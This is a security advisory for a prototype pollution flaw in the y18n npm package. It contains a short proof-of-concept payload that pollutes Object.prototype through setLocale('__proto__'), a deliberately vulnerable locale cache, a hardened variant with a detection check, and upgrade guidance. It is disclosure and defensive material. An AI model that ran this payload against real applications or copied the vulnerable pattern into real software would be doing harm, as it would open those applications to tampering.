Severity: high

    Prototype Pollution

    y18n

    Overview

    y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to prototype pollution.

    POC

    const y18n = require('y18n')();

    // The locale name is used directly as an object key, so "__proto__"
    // selects Object.prototype as the locale to update.
    y18n.setLocale('__proto__');
    y18n.updateLocale({polluted: true});

    // The property now appears on every object in the process.
    console.log(polluted); // true
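    An added example (not y18n's code or part of the advisory): a minimal locale cache that reproduces the pollution pattern in the POC above, next to a hardened variant that uses a null-prototype cache and rejects prototype-related keys. The function names are hypothetical.

```javascript
// Vulnerable stand-in: the locale name is used as a key on a plain object,
// so setting the locale to "__proto__" makes updateLocale write into
// Object.prototype (same pattern as the advisory's POC).
function makeVulnerableCache() {
  const cache = {};
  let locale = 'en';
  return {
    setLocale(name) { locale = name; },
    updateLocale(obj) {
      if (!cache[locale]) cache[locale] = {};
      for (const key of Object.keys(obj)) cache[locale][key] = obj[key];
    },
  };
}

// Hardened stand-in: a null-prototype cache means "__proto__" is just an
// ordinary own key, and locale names and translation keys are validated.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function makeSafeCache() {
  const cache = Object.create(null);
  let locale = 'en';
  return {
    setLocale(name) {
      if (typeof name !== 'string' || FORBIDDEN.has(name)) {
        throw new TypeError(`invalid locale: ${name}`);
      }
      locale = name;
    },
    updateLocale(obj) {
      if (!cache[locale]) cache[locale] = Object.create(null);
      for (const key of Object.keys(obj)) {
        if (FORBIDDEN.has(key)) throw new TypeError(`invalid key: ${key}`);
        cache[locale][key] = obj[key];
      }
    },
    get(key) { return cache[locale] ? cache[locale][key] : undefined; },
  };
}

// Detection check: run the POC sequence against a cache built by `factory`
// and report whether a fresh, unrelated object picked up "polluted".
function pollutes(factory) {
  const y = factory();
  try { y.setLocale('__proto__'); y.updateLocale({ polluted: true }); }
  catch (e) { /* hardened cache rejects the locale name */ }
  const leaked = ({}).polluted === true;
  delete Object.prototype.polluted; // undo any pollution so later checks start clean
  return leaked;
}
```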

    Remediation

    Upgrade to version 3.2.2, 4.0.1, or 5.0.5 or later, whichever patched release matches the major version in use.

    Advisory timeline

    1. published

      Advisory Published
      Mar 29th, 2021
    2. reported

      Reported by Anonymous
      Mar 12th, 2021